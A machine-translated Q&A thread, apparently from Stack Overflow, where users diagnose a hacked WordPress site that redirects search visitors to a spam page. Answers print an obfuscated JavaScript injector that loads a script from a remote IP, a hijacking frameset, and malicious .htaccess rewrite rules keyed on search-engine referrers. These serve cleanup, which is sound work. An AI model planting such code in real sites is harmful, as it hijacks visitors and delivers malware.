谷歌搜索后的页面重定向 - Wordpress网站被黑了

时间:2014-03-31 09:20:05

标签: wordpress virus

我们有页面域..,当您在google.nl上搜索到Critical Alignment并点击该网站的主页时,您会在几秒钟后重定向到http://www.venusfactor.com/welcome/。我们认为该网站遭到黑客攻击,但找不到重定向或其他任何内容。

有人可以帮忙吗?

5 个答案:

答案 0 :(得分:0)

您是否检查过重定向是否在托管域的位置?不知道您使用的是哪种主机,但是域名可能设置为从主机端重定向到该页面。

答案 1 :(得分:0)

当您的网站遭到黑客入侵时该怎么做的一个很好的指南是:http://codex.wordpress.org/FAQ_My_site_was_hacked

对于您的问题,请先检查.htaccess。文件的最右侧可能有一些重定向线,因此请使用水平滚动条。

此外,我建议您与您的主机核实,因为可能会有更多文件受到影响。

答案 2 :(得分:0)

同样的事情发生在我身上。

首先我认为这是一个DNS黑客问题,因为它是一个重定向问题。托管公司回应我说DNS没有问题。 Tey检查了其他常见问题以找到重定向的来源,并且我被告知在活动主题文件夹中我在header.php文件中有一个 malitious脚本

我在cPanel中手动检查了文件,然后找到了导致重定向的脚本。要了解有关此内容的更多信息,请查看IStartBlogging

上的文章

答案 3 :(得分:0)

一种新的病毒正在蔓延,滥用wordpress的xmlrpc.php将自身注入服务器并用自己的污染副本替换javascript文件。

如果您看到太多xmlrpc请求来自可疑IP地址的POST请求(如下所示),请验证您的javascript文件的完整性。

$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

这种病毒的一个关键特性是,它主要针对jQuery.js,将其替换为自己的版本(当用户浏览到您的网站时,会自动将它们重定向到clickbait文章)。

它通过首先发布一个新的php文件来实现这一点,例如recure.php通常包含混淆的php代码,或者将wordpress插件上传到upload文件夹。

答案 4 :(得分:-1)

如果引用的网页 google,yahoo,msn,aol,bing ,攻击者很可能会尝试将网页重定向到其他网站。
当我们从上面指定的推荐请求页面时,他们将返回一个框架集(类似于iframe)。

 <frameset rows="*,0" framespacing="0" border="0" frameborder="NO" data-gr-c-s-loaded="true">
        <frame src="http://remote_site_address_here" noresize="" scrolling="auto">
        <link rel="stylesheet" type="text/css" href="chrome-extensionlink/content.css">
</frameset>

因此,我们会在地址栏的顶部看到我们的网站名称,但网站内容会有所不同。这些是黑客用于注入可疑代码的常见文件。

  1. 的index.php
  2. 的index.html
  3. 的header.php
  4. footer.php
  5. 的functions.php
  6. 主题文件
  7. 的.htaccess

    8. 现在最近被感染的案例显示恶意代码注入是使用 .htaccess 文件。在这里,我演示了注入的 .htaccess 文件。 在Web根目录中打开 .htaccess 文件。你可以看到这个配置

    RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ emilie-amethyst.php?$1 [L]

    如果推荐页面是google | yahoo | msn | aol | bing,他们会重定向到恶意php文件 emilie-amethyst.php 。这就是重定向问题的原因  因此,您必须从 .htaccess 文件中删除此重定向配置,并删除恶意脚本(在本例中为 emilie-amethyst.php )。

    尝试点击谷歌搜索中的链接。仍然,如果您发现问题,请删除与此特定网站相关的所有Cookie,然后重试。它应该解决问题

相关问题
最新问题